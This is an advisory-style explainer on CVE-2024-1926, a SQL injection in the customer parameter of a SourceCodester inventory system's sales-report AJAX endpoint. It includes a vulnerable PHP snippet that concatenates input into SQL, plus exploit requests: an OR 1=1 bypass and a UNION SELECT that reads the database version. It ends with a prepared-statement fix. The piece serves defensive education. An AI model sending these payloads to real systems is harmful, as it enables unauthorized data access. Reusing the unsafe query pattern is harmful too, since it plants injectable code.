CVE-2024-1926 - Critical SQL Injection in SourceCodester Free and Open Source Inventory Management System 1.

A critical security flaw has been discovered in SourceCodester's Free and Open Source Inventory Management System (version 1.). This vulnerability, tracked as CVE-2024-1926 (see VDB-254861), allows remote attackers to perform SQL Injection by manipulating the customer parameter in one of the application's AJAX requests. This long-form post explains how the vulnerability works, offers technical details, shows relevant code snippets, explores exploitation techniques, and provides references for further reading. Our aim is to help users, sysadmins, and developers understand and mitigate the risk.

Product: SourceCodester Free and Open Source Inventory Management System 1.

- Component: /app/ajax/search_sales_report.php

Attack Vector: Remote

- CVE Reference: CVE-2024-1926
- Vulnerability Database Reference: VDB-254861

Technical Breakdown

The issue lies in how the web application processes user input for the customer parameter inside the search_sales_report.php file. User-supplied data is inserted into an SQL query without proper sanitization or escaping, allowing attackers to modify the query.

On the backend, search_sales_report.php code might look like this simplified PHP snippet

<?php
// This is a simplified example for demonstration
include("db_connect.php");
$customer = $_GET['customer'];   // <-- user-controlled
$sql = "SELECT * FROM sales WHERE customer = '$customer'";
$result = mysqli_query($conn, $sql);
?>

Notice

- The customer input from the URL is directly inserted into the SQL statement without sanitization.

Here’s what a normal request looks like

GET /app/ajax/search_sales_report.php?customer=John HTTP/1.1
Host: target.site

An attacker could exploit the flaw using a URL like

GET /app/ajax/search_sales_report.php?customer=John'%20OR%201=1--+ HTTP/1.1
Host: target.site

This modifies the SQL to

SELECT * FROM sales WHERE customer = 'John' OR 1=1-- '

What does it do?
The OR 1=1 part makes the condition always true, so the query returns all records, not just John. With more advanced payloads, an attacker could even dump sensitive data, bypass authentication, or modify records.

The following payload extracts the database version (using MySQL)

GET /app/ajax/search_sales_report.php?customer=' UNION SELECT 1,@@version,3,4--+ HTTP/1.1
Host: target.site

Data exposure: The attacker could read (and possibly write or delete) sensitive data.

- Privilege escalation: In some cases, the attacker could take full control of the database or app.

Sanitize Input: Filter and escape all user-supplied data.

- Update Software: Apply official patches or updates if/when they become available.

Fixed (using prepared statements, mysqli)

<?php
include("db_connect.php");
$customer = $_GET['customer'];
$stmt = $conn->prepare("SELECT * FROM sales WHERE customer = ?");
$stmt->bind_param("s", $customer);
$stmt->execute();
$result = $stmt->get_result();
?>

References

- CVE-2024-1926 Record at MITRE
- VulDB: VDB-254861
- Original Project at SourceCodester
- OWASP SQL Injection Guide

Conclusion

CVE-2024-1926 in SourceCodester's Inventory Management System serves as a reminder of the importance of secure coding—never trust user input!
If you use this software (or any similar open-source application), audit your code and apply security best practices. Knowing how vulnerabilities are exploited can help everyone be safer online.

Timeline

Published on: 02/27/2024 17:15:11 UTC
Last modified on: 03/21/2024 02:51:49 UTC